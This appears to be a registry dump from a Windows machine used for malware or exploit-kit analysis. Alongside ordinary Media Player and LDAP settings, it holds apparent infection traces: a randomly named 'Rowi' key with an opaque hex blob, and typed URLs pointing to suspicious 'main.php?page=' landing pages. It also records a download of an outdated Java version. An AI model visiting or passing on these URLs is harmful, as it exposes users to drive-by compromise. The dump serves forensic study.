HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	Account Name		"VeriSign Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Server		"directory.verisign.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP URL		"http://www.verisign.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Search Return		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Timeout		dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Authentication		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Search Base		"NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Simple Search		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Logo		hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Server ID		dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	Account Name		"WhoWhere Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Server		"ldap.whowhere.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP URL		"http://www.whowhere.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Search Return		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Timeout		dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Authentication		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Simple Search		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Logo		hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Rowi
HKEY_CURRENT_USER\Software\Microsoft\Rowi	Xoywarsu		hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,
HKEY_CURRENT_USER\Software\Microsoft\Siabvu
HKEY_CURRENT_USER\Software\Microsoft\WAB
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4	OlkContactRefresh		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4	OlkFolderRefresh		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4	FirstRun		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name	@		"C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	FriendlyName		"Default MidiOut Device"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	CLSID		"{07B65360-C445-11CE-AFDE-00AA006C14F4}"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	FilterData		hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	MidiOutId		dword:ffffffff
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	FriendlyName		"Default DirectSound Device"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	CLSID		"{79376820-07D0-11CF-A24D-0020AFD79767}"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	FilterData		hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	DSGuid		"{00000000-0000-0000-0000-000000000000}"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy	CleanCookies		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing	NewTabPageShowClosedTabs		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing	NewTabPageShowActivities		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar	CompatibilityViewButtonBalloonCount	dword:00000001	dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active	{8CFA7582-04D2-11E2-A16C-08002765500A}		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active	{E4F1361D-04D0-11E2-A16B-08002765500A}	dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url1	"http://www.google.com/"	"http://46.249.59.116/main.php?page=5a56c997ffff2f79"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url2	"http://google.com/"	"http://www.google.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url3	"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"	"http://ns8.ns360.info/main.php?page=f61d19dee2176c62"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url4	"http://urlquery.net/"	"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url5	"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"	"http://urlquery.net/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url6	"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"	"http://google.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url7	"http://oldversion.com/"	"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url8	"http://go.microsoft.com/fwlink/?LinkId=69157"	"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url9		"http://oldversion.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs	url10		"http://go.microsoft.com/fwlink/?LinkId=69157"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}	AttemptedAutoRun		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}	AttemptedAutoRun		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz	Prefs		"mute;False"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	InitFlags		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	ShowHorizontalSeparator		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	ShowVerticalSeparator		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	PlaylistWidth		dword:000000ba
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	PlaylistHeight		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	SettingsWidth		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	SettingsHeight		dword:00000087
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	MetadataWidth		dword:000000ba
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	MetadataHeight		dword:000000a0
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	CaptionsHeight		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings	Client ID	"{43209BE6-BD53-40A7-9DD3-50364635A3E4}"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	AcceptedPrivacyStatement	dword:00000000	dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	MetadataRetrieval		dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	SendUserGUID		hex:00,
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	SilentAcquisition		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UsageTracking		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	DisableMRU		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	LaunchIndex		dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	AppColorLimited		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	FirstRun		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	X		"10"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Y		"10"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Width		"686"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Height		"536"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Maximized		"0"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Volume		dword:00000032
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ModeShuffle		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ModeLoop		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Mute		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	Balance		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentEffectType		"Battery"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentEffectPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	VideoZoom		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ShrinkToFit		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ShowEffects		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ShowFullScreenPlaylist		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	NowPlayingQuickHide		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ShowTitles		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ShowCaptions		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	NowPlayingPlaylist		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	NowPlayingMetadata		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	NowPlayingSettings		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	VizAutoSelect		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentDisplayView		"VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentSettingsView		"EQView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentMetadataView		"MediaInfoView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentDisplayPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentSettingsPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	CurrentMetadataPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserDisplayView		"VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPDisplayView		"VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPSettingsView		"EQView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPMetadataView		"MediaInfoView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserDisplayPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPDisplayPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPSettingsPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPMetadataPreset		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPShowSettings		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	UserWMPShowMetadata		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	ShowAlbumArt		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	RandomFolderName		"0009236B"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	LastPlaylist		hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	LastPlaylistQuery		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences	LastPlaylistIndex		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyStyle		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyName		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyPort		dword:00000050
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyBypass		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyExclude		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyStyle		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyName		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyPort		dword:000006db
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyBypass		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyExclude		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyStyle		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyName		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyPort		dword:0000022a
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyBypass		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyExclude		""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions	DesktopShortcut		"no"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions	QuickLaunchShortcut		"yes"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\CreatedLinks	Shortcut4		"C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache	0		hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU	a		hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU	MRUList		"a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU	a		"C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU	MRUList		"a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*	a		"C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*	MRUList		"a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs	Order	hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,	